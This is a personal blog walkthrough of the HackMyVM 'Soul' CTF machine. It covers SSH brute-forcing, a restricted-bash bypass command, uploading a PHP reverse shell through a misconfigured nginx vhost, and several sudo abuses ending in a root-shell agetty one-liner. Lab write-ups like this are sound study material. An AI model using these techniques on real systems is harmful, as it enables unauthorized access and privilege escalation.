Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Soul Walkthrough.(ngnix bad config, privilege escalation through agetty)

(英语写几篇,便于国际友人搜索浏览。都是简单句,国内的同学看着应该也不太费劲。)


A very tricky VM, level is hard, can be download here.


First, use nmap to scan ports.

图片.png


Gobuser to bruteforce folders and files at port 80, found nothing.

图片.png


There's only one image at index.html.

图片.png


Download and extract pass.txt from the jpg file.

图片.png


Use hydra to brutefoce ssh user's name.

图片.png


Logged in as user daneil through ssh, but the bash is restricted.

图片.png


Again, logged in with "-t"option to bypass resctricted bash.

ssh daniel@192.168.56.35 -t "bash --noprofile"

There are three users in home directory. And the user flag is in gabriel's home. So, we need to escalate to other user.

图片.png

Here is the most tricky part. As user daniel, I spend a lot of time browse the VM, but found nothing.  Then I asked for help from this great guy @d4t4s3c.  In /etc/nginx/sites-available, we can find a URL name: loneysoul.hmv.

图片.png


In fact, if we put some php into /var/www/html, and access it directly through IP, it will not be interpreted. But if called from lonelysol.hmv/xxx.php, it will be interpreted. And, the author did want us to get www-data user as the second user, but not the other two in /home folder. 


Upload a reverse shell php file in /var/www/html, and curl it through url, we get reverse shell of user www-data.

图片.png


User 'www-data' can sudo /tmp/whoami, so we create a file named whoami in /tmp, and code is: bash.

图片.png


Sudo to user gabriel, and now we get the user flag.

图片.png


Continue, user "gabriel" can sudo hping3, then escalate to user "peter".

图片.png


Here is the second hard part. We can find that /usr/sbin/agetty maybe an useful file for privilege escalation, so I googled a lot, but found no answer.

图片.png


Thanks for the great spanish guy @d4t4s3c. Here is the magic cmd:

/usr/sbin/agetty  -o -p -a  root -l /bin/bash tty

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0